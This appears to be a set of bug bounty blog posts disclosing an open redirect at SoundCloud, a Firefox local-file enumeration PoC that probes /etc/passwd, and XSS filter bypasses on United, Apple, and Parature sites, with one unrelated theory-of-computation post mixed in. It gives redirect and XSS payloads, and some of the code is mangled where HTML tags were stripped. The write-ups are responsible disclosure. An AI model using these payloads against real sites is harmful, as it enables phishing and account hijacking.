Bypassing SoundCloud’s protection for open redirections

Hello everybody,

In this blog post I will be explaining how I found an open redirects issue in SoundCloud’s redirection system, which could have been abused by attackers to mislead users and maybe phish their credentials or trick them into performing harmful actions.

So it was a rainy day and I was just getting home after a long day working on university assignments (I have to mention that to unload it :S), when I noticed that I have received a message from SoundCloud informing me that a user likes a track I previously posted on my profile.

I started looking around for links and noticed an interesting link that uses a GET parameter called “url”, which clearly works as an intermediate medium that redirects to whatever that parameter points to. The link looked like the following (Follow the link, the track is cool for those who like Trance and EDM 😉 ):

http://soundcloud.com/-/t/click/postman-email-notifications-sound_like?url=https%3A%2F%2Fsoundcloud.com%2Fstrukt-93%2Fjohnny-fiasco-johnny-fiasco-conduction-santiago-bushido-remix-defalts-music

So I immediately started messing around for a while to see if it’s well protected against open redirects. After trying for like 10 minutes, I concluded the following points (URL shortened for simplicity):

  • We can actually redirect to https://whatever.soundcloud.com, but that would be pointless because we need to find a subdomain takeover first, which is clearly a bigger issue in itself anyways.
  • Using any scheme before the domain name is accepted, and by “any scheme” I mean that strukt://soundcloud.com would cause the server to happily issue a 302 redirect to strukt://soundcloud.com.
  • The string supplied to the “url” parameter cannot start with a dot.

So with all the givens (disregarding the second point as it’s not that useful in our context), I was wondering how can I leverage these bits of knowledge into bypassing the protection in place.
Eventually, a simple but often interesting thought came to my mind, what would happen if I try to inject CRLF characters somewhere in the value of the “url” parameter? , maybe I can achieve a different behavior or at the very least an error that would guide me further. So I started with %0a (LF) and it was completely ignored by the application, the redirect was made to https://soundcloud.com.

I then tried with %0d (CR) and, to my surprise, I received a different response than the first one.

The value injected after the %0d character is directly appended to the string “http://soundcloud.com”, I tried to then change whatever is after the CR character but it seems like it’s still checked by the back end code. But wait a second !, we know that we can substitute the scheme of the URL we are supplying with whatever we want, right ? Well, yes, we can actually supply any string we want before the “://soundcloud.com” part. So the following is acceptable:

http://soundcloud.com/-/t/click/postman-email-notifications-sound_like?url=evilsoundcloud.com://soundcloud.com

And the following are the request and response of the above:

And voilà!, a redirect to http://soundcloud.comevilsoundcloud.com//soundcloud.com is issued by SoundCloud’s server with no complaints.

Thanks for reading, see you in another write up

Introduction to the Theory of Computation: Prologue

Welcome everybody,

In an old tweet, I asked if anyone would be interested in blog posts explaining theoretical computing and the theory of computation. Although around 10 people only reacted to the tweet, I still decided to go on and start a series of blog posts explaining the matter.

The reason why I chose to do so is that, aside from being very important to understand for those majoring in CS, the theory of computation is a very interesting subject that will help the readers further expand their knowledge and understanding of how computers work at the very basic level.

Curriculum

The curriculum we will be following in order to deeply and thoroughly explain the fundamentals of the theory of computation is that included in the book dubbed “Introduction to the Theory of Computation”, written by Michael Sipser.

I will be explaining the chapters one by one in separate blog posts, and maybe divide a chapter into more than one blog post if it was found to be lengthy or mind consuming for the readers. Now, let’s start with the very first part of the book, where we briefly go over a simple overview of what’s actually covered under this course.

Automata, Computability, and Complexity

Those are the three main parts the book is concentrating on explaining and discussing, they can be grouped under the following question:

What are the fundamental capabilities and limitations of computers ?

Mathematicians have started researching into answering the above question since 1930, and since then computers have significantly advanced and helped bring the question out of the theoretical world and into the practical world.  The question can be answered and interpreted differently in each of these three areas, which will be covered throughout the course.

Complexity Theory:

Computer problems can be either easy or hard to solve. For example, the sorting problem is not as hard as the scheduling problem. Say that you have a million numbers that you want to sort in either ascending or descending order, this can be done by a regular computer in a relatively timely manner. But if we try to schedule a thousand classes into one timetable, considering some rules such as no two classes exist at the same time in the same room and that an instructor teaching two courses can’t exist in two classrooms simultaneously, this appears to be of much greater difficulty to calculate. In fact, a super computer would require centuries to determine an answer to that particular scenario. The following question is the main question asked when it comes to the complexity theory:

What makes some problems computationally hard and others easy ?

Although it may look like an easy question, computer scientists still don’t have a complete answer to that question so far. However, they were able to at least classify computer problems according to how computationally difficult they are, which allows us to find a way to give evidence that a problem is computationally hard although we don’t have the ability to prove so.

There are different approaches to be followed when one stumbles upon a problem that is computationally hard to solve. First, if the root of the problem can be clearly determined, some alteration to that root may result in reshaping the problem into an easier form that can be computed faster to solve the main problem. Second, if the first approach is out of hand, sometimes finding an approximate solution for the problem may do in relation with the main problem. Third, some problems are only hard to compute in their worst case scenario, and are easily computed in normal cases, which may be acceptable for some if they have no problem running slow sometimes but fast most of the time. There are also other ways, such as considering different types of computation, such as randomized computation.

An application that most of the readers can relate to is Cryptography. Unlike most of the cases, where we always seek to employ easier computational problems rather than harder ones because they are easier to solve, Cryptography seeks to employ hard problems as it’s main aim is to produce strings that are often unbreakable, or at least very costly to break. This can be easily illustrated in the bruteforcing process of a password, where we observe that a password that is 5 characters long would take much lesser time to bruteforce than another that is 7 characters long.

Computability Theory

Mathematicians such as Alan Turing, Alonso Church, and Kurt Gödel have discovered that certain basic problems cannot be solved by computers. For example, although a purely mathematical problem, determining whether a mathematical statement is true or false cannot be solved by a computer. An outcome of researching this area was the development of theoretical models of the computers we are using in modern times, such as Turing Machines and Finite Automata.

Complexity and computability theories are closely related. In short, the complexity theory is the one concerning the research in order to determine how computationally hard a problem is, whereas the computability theory is all about determining whether a problem can be computationally solved in the first place.

Automata Theory

This last part deals with how we define a mathematical model of a computer that are used in many areas of computer science. One model that I just mentioned is the Finite Automaton, which is used in text processing and compiler design. Another is Context-Free Grammar, which is used in designing programming languages.

From this theory, we will begin understanding the theory of computation. This is because the complexity and computability theories need to first define what a “computer” is, which we will go through by studying the automata theory.

With this we would come to the end of the first blog post in the series of the theory of computation. See you in the next post, where we will be going over some mathematical notions and basic terminologies.

Please leave your comments if anything is not clear enough or needs further explanation, Twitter DMs are available as well.

Firefox Local Filename Enumeration (sec-low)

Hello everyone,

This is going to be a short write up about my first find regarding browser bugs, which was found in Firefox/45.0. The bug is of type “csectype-disclosure” and was flagged as sec-low by Mozilla’s team due to the fact that the malicious page has to be loaded locally (via the file:// protocol).

The bug existed because a ‘s onerror event is fired twice if the file pointed to in it’s src attribute doesn’t exist, but fires only once if the file existed but is not playable. The tag has to be included inside the opening and closing tags of an or . The following code is the PoC that was typically sent along with the report to Mozilla’s team:

<html>
<head>
<title>Testingtitle>
head>
<audio>
   <track id="q" src="file:///etc/passwd">
audio>
<script>
var i=0;
q.onerror=function(){
    i++;
   
};
setTimeout(function(){
    if(i==1){
            alert('File Exists');
        }else{
            alert('File Does Not Exist');
            }
 
    },100);
script>
body>
html>

Finally, I would like to shout out to @Qab for making all that possible.

Update: This bug has been assigned CVE-2017-5387.

United to XSS United

Hello there,

In this blog post, I will explain how I was able to bypass some client-side based XSS so called “protection”.

While I was looking for cheap flights, I recalled that United offer a bug bounty program that rewards free mileage to researchers who report security vulnerabilities.

As I started looking testing their websites, I found a couple of bugs and reported them, then I came accross the subdomain http://checkin.united.com.

Visiting the above link redirected me to another page on the same subdomain, with a GET parameter called “SID”. I started testing that parameter and noticed that it’s value gets reflected in the document 60+ times, none of which is well sanitized against special characters, allowing me to break out of the tags it reflects in in 100% of the times it does.

I simply entered “> to get the alert box I’m looking for, but weird enough, no alert boxes were there at all, I then inspected the source of the page and found that my injection actually lands untouched exactly the same 60+ times, yet the JS payload doesn’t execute.

Some of the payload reflections in the document

I started digging more into the script tags and what codes do they contain, until I reached the source of my misery, a JS file that is included into the page and contains the following code:

JS code that caused the trouble

Basically, the code overrides the native alert(), confirm(), prompt(), unescape(), and document.write() functions and nullifies them, so calling them does absolutely nothing. This was implemented as an “XSS protection”.

So after some research, I managed to restore document.write() to it’s default state by calling document.write = HTMLDocument.prototype.write;document.write(‘STRUKT’);, but again, what good does that do with all the main functions I want to access sabotaged.

Using document.write() to print into the document

 

I started playing around with the help of my friend and teacher @brutelogic, he provided me with this link, which talks about the JS defense in place. The article also mentioned that we could get the overridden functions back to their defaults by using the word delete. We tried the keyword and it happened to be blacklisted as well, then I had an idea. What if I inject empty iframe tags (without the src attribute) and then set the main window’s alert() function to any of these iframes’ native alert functions, it will then be reset to the default alert() function any document has.

I tried the new idea and it actually worked, bypassing all the “XSS protections” in place and circumventing the overrides implemented by the developers.

The beloved alert box finally popping up

Then my friend @brutelogic managed to optimize the payload to a much shorter one, with the ability to work in Chrome and bypass Auditor (Because there’s also an unsanitized reflection in a tag context).

Brute’s payload working in Firefox
Brute’s payload bypassing Chrome’s XSS Auditor

Then I’ve decided to go further and check if United’s main website contains any flaws. After spending less than 10 minutes of investigation, I found out that the exact same vulnerable path found on http://checkin.united.com exists on United’s main website, with absolutely the same imported libraries and the 60+ vulnerable reflections, killing two birds with one stone.

XSSing United’s main website with the same payload

Finally, I would like to thank my teacher and friend @brutelogic for his continuous support and generosity in providing me with brilliant and unexpected information.

See you in another post 😉 

Apple and the 5 XSSes

Hello guys and welcome back,

On the 10th of March, 2016 I decided to start looking for Cross Site Scripting vulnerabilities in Apple’s websites, I really can’t remember what motives drove me to start looking for bugs there, but it was a good idea anyways.

I first started enumerating the targets as usual, found a big list of subdomains and started to look for XSS bugs on each of them.

Spending a couple of hours looking for XSSes and finding nothing at all, I started to notice that most of the subdomains need the users to be logged in first to start using them, so I created an Apple ID and started logging in each of the subdomains to have some deeper look into each of them.

The first XSS I found was a reflective XSS on the subdomain https://checkcoverage.apple.com, which is designed for users that want to check their Apple products’ warranty status and whether they are eligible for support and extended coverage or not.

While surfing the subdomain I just mentioned, I found a GET parameter called “sn”, which is -obviously- the placeholder of the serial number of the product the user wants to check, I started probing to see if the parameter’s value gets reflected in the page, so I used a string as simple as <"xss' to check if any of those special characters gets removed or encoded. See the following screenshot:

The injected payload is reflected inside a tag with no encoding or sanitization of the special characters at all, thus injecting “-alert(document.domain)-” was enough to trigger the following alert box:

The second XSS is a stored one and lies in the subdomain https://iadworkbench.apple.com/, this subdomain is for advertising purposes and business related stuff, where I found that the organization’s name gets reflected inside a tag without any sanitization.

Again, using “-alert(document.domain)-“, I was able to come up with the following alert box:

The third XSS I found was on the subdomain https://appleid.apple.com, if you click on that link, you will find the message “Your account for everything Apple.” written between two
<h2> tags. Yes, this subdomain is there for users to manage their Apple IDs, which allows them to access everything they use, related to Apple.
I started missing around with the parameters I see, until I came across the GET parameter “key”, which over and over again, gets reflected inside a context without any cleansing, leaving one of Apple’s most important online services vulnerable to one of the simplest, yet very devastating attacks. See the following screenshot:

This time, just to change the XSS vector, I decided to close the tag prematurely and inject my own tag, and I noticed that and were getting removed completely from the input, but for example is not removed, so I tried to inject alert(1), but the alert box didn’t appear.

I found out that was still removed, so I tried alert(1) and this time it worked, showing that Apple was protecting one of their most important online services with one of the worst approaches ever.

The fourth XSS affects the subdomain http://mynews.apple.com, and honestly, this is one of the weirdest and easiest XSSes I have ever met.

Developers often do some mistakes, like getting parameter values and letting them into the page source with inappropriate handling first. But in this case, the case was pretty different, the developers were getting he value of the “locale” GET parameter, appending it to some URL, and then using it as the action attribute of a on the page, nothing strange, right ?!

Actually no, the very bizarre thing here was that they were correctly encoding the ” and < of the injected payload correctly, but they used the value of the action parameter unquoted. See the following screenshot for more understanding:

Breaking out of the action attribute then was a piece of cake, adding a %20 (space) after the value of the “locale” parameter and adding an event handler with a payload such as “onmouseover=alert(document.domain)” was all that is needed to do the job.

The fifth and last XSS in this series was found on the subdomain https://atlaslms.apple.com, this XSS was pretty straight forward, a GET parameter called “criteria” was being inserted as the value attribute of some hidden tag and no sanitization at all was there, so I just injected the string “> to alert.

Conclusion:

While Apple may be doing a good job securing their OSs and devices, they fail big time when it comes to protecting their own online services, including those who are somewhat critical to users.
The other thing I’d like to mention is that Apple, being a tech giant, doesn’t pay bounties to whitehats. Which, from my point of view, is the main reason why they’re not well secured, as well as the reason why a blackhat was happy to get paid to hack into the iPhone the U.S government was trying to convince Apple to get them access to.

Finally, I would like to mention that, after more than 3 months of reporting the issues, some of the bugs are still reproducible at the time this post is released. Also, I was asked to provide my information on the 23rd of March to enter Apple’s Hall of Fame for https://appleid.apple.com‘s XSS, yet my name still doesn’t appear there.

Thanks for reading, see you in another post.

Microsoft’s Parature XSS

Hello,

One day, I decided to test ask.com and it’s subdomains for XSS. While doing so, I came across a link that points to their help center, which is located at help.ask.com.

Clicking on the link, the URL was translated to http://help.ask.com/ics/support/default.asp?deptID=30018&_referrer= , I started testing the parameter “_referrer” to see if it was vulnerable to open redirects.

I found that the value of the parameter gets reflected inside a function inside a , so I quitted testing for open redirects and started looking for a way to trigger an XSS, see the following picture:

The developers did not sanitize the value of “_referrer” properly, double quotes, alert() and similar functions, and tags were all allowed. So all I needed at this stage was some help from my friend and teacher, Brute Logic. He noticed that the function exitSupport() was never called on the page, so all he needed to do was to break out of it.
The following two screenshots show the code after the injection of the payload and the alert box:

 After we successfully triggered the alert box, Brute suggested that I should look deeper into the bug, saying “don’t stop there, try to figure out where the rabbit hole really goes”.

He then told me to look for websites containing the same code inside the script tag. He advised me to use nerdydata.com, so I went to the mentioned website and started searching for the function exitSupport(). And there was the surprise, I found dozens of websites using the flawed piece of software. See the picture below:

Going further into the research, Brute quickly identified the origin of the flawed script using , the following screenshot shows the name of the flawed service:

We only realized that the product was owned and developed by Microsoft after we visited Parature’s official website, parature.com :

The following is an excerpt from parature.com :

“Parature is a cloud-based customer service solution that empowers brands and organizations to deliver consistent care anytime, anywhere through a powerful combination of knowledge management, self-service and multi-channel engagement. Quick to deploy, scalable and flexible, and mobile-responsive, discover the customer support software solution that many of the world’s leading brands are using to deliver productive, proactive and personalized customer care.”.

Then, we decided to look for other websites being affected by the flaw, and we found some big names, below is a GIF containing some of these names:

Timeline:

  • 17-11-2015 Initial report, Microsoft replied that they couldn’t reproduce the issue, further explanation of the issue is sent
  • 18-11-2015 Microsoft replied that they opened a case for the bug
  • 30-11-2015 I sent an email asking if the bug has been fixed
  • 02-12-2015 Microsoft replied that the issue is fixed and asked for our names for the Hall of Fame
  • 19-01-2015 The Hall of Fame for the month of December is released

Beware !! Vodafone’s spying on you

Hello,

Today, while surfing on Twitter, I noticed Brute Logic’s Tweet about the JS event handler “onbeforescriptexecute”, which makes a tag execute JS right before every tag on the page starts execution.

I followed the link provided in the tweet anticipating that only one alert will be there because of the tag that is already in the page, but I was surprised to see that actually two alert boxes appeared.

I inspected the source code of the page, and was thrilled to see a completely new tag there, which was not there in the first place on the page, neither was it injected in the payload. See the following screenshot:

After some research on Google, I found out that the script gets injected by my ISP, Vodafone. This means that they are intercepting and eavesdropping on EVERY request I make to EVERY page that doesn’t use HTTPS as protocol, and of course EVERYONE else’s requests as well.

The script basically replaces all the images in a given page with low quality ones, saving bandwidth for Vodafone, and giving them the opportunity to inspect every request issued by the devices connected to them.
 
Reference: http://www.sphaero.org/blog:2012:0418_am_i_hacked_oh_it_s_just_vodafone